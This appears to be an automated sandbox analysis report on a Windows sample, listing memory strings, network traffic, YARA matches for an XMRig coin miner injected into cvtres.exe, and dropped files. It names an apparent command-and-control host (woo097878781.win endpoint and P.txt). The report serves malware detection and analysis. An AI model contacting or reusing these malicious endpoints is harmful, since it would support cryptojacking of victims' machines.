Source: cvtres.exe, 00000007.00000003.2148391342.00000171D4680000.00000004.00000001.00020000.00000000.sdmp, cvtres.exe, 00000012.00000003.3332406842.000001FA08B00000.00000004.00000001.00020000.00000000.sdmp, orupcopicsyv.sys.7.dr	String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: qmgr.db.11.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.11.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.11.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.11.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 0000000B.00000003.4104526608.0000026794861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.2841938059.00000267946F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adm5fg7myczym5ugfpmw2lireirq_2024.11.8.0/
Source: qmgr.db.11.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.11.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: svchost.exe, 0000000B.00000003.4104526608.0000026794861000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com:80
Source: qmgr.db.11.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000002.00000002.2156917001.0000018DAF6E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.2124724518.0000018D9F898000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: chromecache_122.12.dr	String found in binary or memory: http://schema.org/WebPage
Source: powershell.exe, 00000002.00000002.2124724518.0000018D9F898000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: file.exe, 00000000.00000002.2156184931.000001FB8E176000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2124724518.0000018D9F671000.00000004.00000800.00020000.00000000.sdmp, WindosCPUsystem.exe, 00000009.00000002.3638469569.0000020A5F79A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2124724518.0000018D9F898000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000002.00000002.2124724518.0000018D9F898000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: chromecache_125.12.dr, chromecache_115.12.dr, chromecache_113.12.dr	String found in binary or memory: http://www.broofa.com
Source: chromecache_148.12.dr, chromecache_160.12.dr	String found in binary or memory: https://accounts.google.com/o/oauth2/auth
Source: chromecache_148.12.dr, chromecache_160.12.dr	String found in binary or memory: https://accounts.google.com/o/oauth2/postmessageRelay
Source: chromecache_158.12.dr	String found in binary or memory: https://accounts.google.com/signin/v2/identifier%3Fec%3Dfutura_hpp_co_si_001_p%26continue%3Dhttps%25
Source: powershell.exe, 00000002.00000002.2124724518.0000018D9F671000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: chromecache_148.12.dr, chromecache_160.12.dr, chromecache_122.12.dr, chromecache_113.12.dr	String found in binary or memory: https://apis.google.com
Source: chromecache_141.12.dr, chromecache_118.12.dr	String found in binary or memory: https://apis.google.com/js/api.js
Source: chromecache_131.12.dr, chromecache_126.12.dr	String found in binary or memory: https://cda-push-dev.sandbox.googleapis.com/upload/
Source: chromecache_148.12.dr, chromecache_160.12.dr	String found in binary or memory: https://clients6.google.com
Source: chromecache_126.12.dr	String found in binary or memory: https://content-push.googleapis.com/upload/
Source: chromecache_148.12.dr, chromecache_160.12.dr	String found in binary or memory: https://content.googleapis.com
Source: powershell.exe, 00000002.00000002.2156917001.0000018DAF6E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.2156917001.0000018DAF6E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.2156917001.0000018DAF6E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: chromecache_125.12.dr, chromecache_115.12.dr	String found in binary or memory: https://csp.withgoogle.com/csp/lcreport/
Source: chromecache_148.12.dr, chromecache_160.12.dr	String found in binary or memory: https://domains.google.com/suggest/flow
Source: chromecache_131.12.dr, chromecache_126.12.dr	String found in binary or memory: https://embeddedassistant-webchannel.googleapis.com/google.assistant.embedded.v1.EmbeddedAssistant/A
Source: chromecache_113.12.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey200-36dp/2x/gm_alert_gm_grey200_3
Source: chromecache_113.12.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey600-36dp/2x/gm_alert_gm_grey600_3
Source: chromecache_113.12.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey200-24dp/1x/gm_close_gm_grey200_2
Source: chromecache_113.12.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey600-24dp/1x/gm_close_gm_grey600_2
Source: svchost.exe, 0000000B.00000003.2171096230.0000026794763000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.11.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 0000000B.00000003.2171096230.00000267946F0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.11.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: powershell.exe, 00000002.00000002.2124724518.0000018D9F898000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: file.exe, 00000000.00000002.2656930945.000001FBA6830000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: file.exe, 00000000.00000002.2656930945.000001FBA6830000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: file.exe, 00000000.00000002.2656930945.000001FBA6830000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: file.exe, 00000000.00000002.2156184931.000001FB8E176000.00000004.00000800.00020000.00000000.sdmp, WindosCPUsystem.exe, 00000009.00000002.3638469569.0000020A5F69C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com
Source: chromecache_125.12.dr, chromecache_115.12.dr	String found in binary or memory: https://lens.google.com
Source: chromecache_150.12.dr, chromecache_130.12.dr	String found in binary or memory: https://lens.google.com/gen204
Source: chromecache_115.12.dr	String found in binary or memory: https://lensfrontend-pa.clients6.google.com/v1/crupload
Source: chromecache_125.12.dr, chromecache_115.12.dr	String found in binary or memory: https://lensfrontend-pa.clients6.google.com/v1/gsessionid
Source: powershell.exe, 00000002.00000002.2156917001.0000018DAF6E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: chromecache_122.12.dr	String found in binary or memory: https://ogads-pa.googleapis.com
Source: chromecache_158.12.dr	String found in binary or memory: https://ogs.google.com/
Source: chromecache_122.12.dr	String found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
Source: chromecache_158.12.dr	String found in binary or memory: https://ogs.google.com/widget/callout
Source: chromecache_122.12.dr	String found in binary or memory: https://ogs.google.com/widget/callout?eom=1
Source: chromecache_122.12.dr	String found in binary or memory: https://ogs.google.com/widget/callout?prid=19037050
Source: qmgr.db.11.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:
Source: chromecache_113.12.dr	String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: chromecache_160.12.dr	String found in binary or memory: https://plus.google.com
Source: chromecache_148.12.dr, chromecache_160.12.dr	String found in binary or memory: https://plus.googleapis.com
Source: chromecache_131.12.dr, chromecache_126.12.dr	String found in binary or memory: https://push.clients6.google.com/upload/
Source: chromecache_158.12.dr	String found in binary or memory: https://ssl.gstatic.com
Source: chromecache_147.12.dr, chromecache_121.12.dr	String found in binary or memory: https://ssl.gstatic.com/images/icons/material/system/1x/done_black_16dp.png)
Source: chromecache_147.12.dr, chromecache_121.12.dr	String found in binary or memory: https://ssl.gstatic.com/images/icons/material/system/1x/done_white_16dp.png)
Source: chromecache_147.12.dr, chromecache_121.12.dr	String found in binary or memory: https://ssl.gstatic.com/ui/v1/menu/checkmark2-light.png)
Source: chromecache_147.12.dr, chromecache_121.12.dr	String found in binary or memory: https://ssl.gstatic.com/ui/v1/menu/checkmark2.png)
Source: file.exe, 00000000.00000002.2656930945.000001FBA6830000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: file.exe, 00000000.00000002.2656930945.000001FBA6830000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.2156184931.000001FB8E176000.00000004.00000800.00020000.00000000.sdmp, WindosCPUsystem.exe, 00000009.00000002.3638469569.0000020A5F69C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: file.exe, 00000000.00000002.2656930945.000001FBA6830000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: chromecache_131.12.dr, chromecache_126.12.dr	String found in binary or memory: https://support.google.com/
Source: chromecache_125.12.dr, chromecache_115.12.dr	String found in binary or memory: https://support.google.com/websearch/answer/106230
Source: chromecache_125.12.dr, chromecache_115.12.dr, chromecache_141.12.dr, chromecache_118.12.dr	String found in binary or memory: https://uberproxy-pen-redirect.corp.google.com/uberproxy/pen?url=
Source: explorer.exe, 00000008.00000003.2194188224.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://woo097878781.win
Source: explorer.exe, 00000008.00000003.2804154799.0000000003208000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2194188224.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://woo097878781.win/66/api
Source: explorer.exe, 00000008.00000003.2215824447.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2193150014.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2194188224.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2804259244.0000000003228000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2215570251.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2216408265.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://woo097878781.win/66/api/endpoint.php
Source: explorer.exe, 00000008.00000003.2804259244.0000000003228000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://woo097878781.win/66/api/endpoint.php39
Source: explorer.exe, 00000008.00000003.2804154799.0000000003208000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://woo097878781.win/66/api8
Source: explorer.exe, 00000008.00000003.2216267066.0000000000C9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://woo097878781.win/P.txt
Source: explorer.exe, 00000008.00000003.2804259244.0000000003218000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://woo097878781.win/P.txtC:
Source: explorer.exe, 00000008.00000003.2804371385.0000000003208000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://woo097878781.win/P.txtZ
Source: explorer.exe, 00000008.00000003.2193150014.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://woo097878781.win/P.txtl
Source: chromecache_148.12.dr, chromecache_160.12.dr	String found in binary or memory: https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1
Source: chromecache_125.12.dr, chromecache_115.12.dr	String found in binary or memory: https://www.google.
Source: chromecache_158.12.dr, chromecache_113.12.dr	String found in binary or memory: https://www.google.com
Source: chromecache_158.12.dr	String found in binary or memory: https://www.google.com"
Source: chromecache_122.12.dr	String found in binary or memory: https://www.google.com/_/og/promos/
Source: chromecache_158.12.dr	String found in binary or memory: https://www.google.com/images/hpp/ic_wahlberg_product_core_48.png8.png
Source: chromecache_122.12.dr	String found in binary or memory: https://www.google.com/intl/en/about/products
Source: chromecache_125.12.dr, chromecache_115.12.dr, chromecache_141.12.dr, chromecache_118.12.dr	String found in binary or memory: https://www.google.com/log?format=json&hasfast=true
Source: chromecache_131.12.dr, chromecache_126.12.dr	String found in binary or memory: https://www.google.com/tools/feedback
Source: chromecache_158.12.dr	String found in binary or memory: https://www.google.com/url?q
Source: chromecache_122.12.dr	String found in binary or memory: https://www.google.com/url?q=https://accounts.google.com/signin/v2/identifier%3Fec%3Dfutura_hpp_co_s
Source: chromecache_160.12.dr	String found in binary or memory: https://www.googleapis.com/auth/plus.me
Source: chromecache_160.12.dr	String found in binary or memory: https://www.googleapis.com/auth/plus.people.recommended
Source: chromecache_158.12.dr	String found in binary or memory: https://www.gstatic.com
Source: chromecache_158.12.dr	String found in binary or memory: https://www.gstatic.com/_/boq-one-google/_/r/
Source: chromecache_158.12.dr	String found in binary or memory: https://www.gstatic.com/_/mss/boq-one-google/_/js/k=boq-one-google.OneGoogleWidgetUi.en.TMRuql7m9IQ.
Source: chromecache_113.12.dr	String found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
Source: chromecache_113.12.dr	String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
Source: chromecache_113.12.dr	String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
Source: chromecache_113.12.dr	String found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
Source: chromecache_113.12.dr	String found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
Source: chromecache_122.12.dr	String found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.kK1dM3um3so.2019.O/rt=j/m=qabr
Source: chromecache_122.12.dr	String found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qcwid
Source: chromecache_126.12.dr	String found in binary or memory: https://www.gstatic.com/uservoice/feedback/client/web/
Source: cvtres.exe, 00000007.00000003.2149800904.00000171D47D0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://xmrig.com/docs/algorithms

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50131 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49893 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50120 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50034 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50115
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 50037 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50120
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50131
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49893
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49905 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49922
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50034
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50037
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49914 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49914
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49870
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50115 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49905
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

System Summary

Malicious sample detected (through community Yara rule)

Source: 7.3.cvtres.exe.171d47d0000.1.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 7.3.cvtres.exe.171d47d0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 7.3.cvtres.exe.171d47d0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 7.3.cvtres.exe.171d47d0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 7.3.cvtres.exe.171d47d0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 7.3.cvtres.exe.171d47d0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 00000007.00000003.2149800904.00000171D47D0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000007.00000003.2149800904.00000171D47D0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 00000007.00000003.2149800904.00000171D47D0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects coinmining malware Author: ditekSHen
Source: Process Memory Space: cvtres.exe PID: 7216, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown

Source: C:\Windows\explorer.exe

Process Stats: CPU usage > 49%

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

File created: C:\Users\user\AppData\Local\Temp\orupcopicsyv.sys

Jump to behavior

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF8490ED28D	0_2_00007FF8490ED28D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF8490E12A0	0_2_00007FF8490E12A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF8490E3C7F	0_2_00007FF8490E3C7F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF8490E000A	0_2_00007FF8490E000A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF8490E397A	0_2_00007FF8490E397A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF8490E4BE0	0_2_00007FF8490E4BE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF8490E16F9	0_2_00007FF8490E16F9

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\orupcopicsyv.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5

Source: WindosCPUsystem.exe.0.dr	Static PE information: No import functions for PE file found
Source: file.exe	Static PE information: No import functions for PE file found

Source: file.exe, 00000000.00000002.2656930945.000001FBA6830000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs file.exe
Source: file.exe, 00000000.00000000.2030619757.000001FB8C47E000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilename98.exe& vs file.exe
Source: file.exe, 00000000.00000002.3127265786.000001FBA7CF0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs file.exe
Source: file.exe, 00000000.00000002.2876558142.000001FBA7475000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskSchedulr. vs file.exe
Source: file.exe, 00000000.00000002.2156184931.000001FB8E176000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs file.exe
Source: file.exe	Binary or memory string: OriginalFilename98.exe& vs file.exe

Source: 7.3.cvtres.exe.171d47d0000.1.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 7.3.cvtres.exe.171d47d0000.1.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 7.3.cvtres.exe.171d47d0000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 7.3.cvtres.exe.171d47d0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
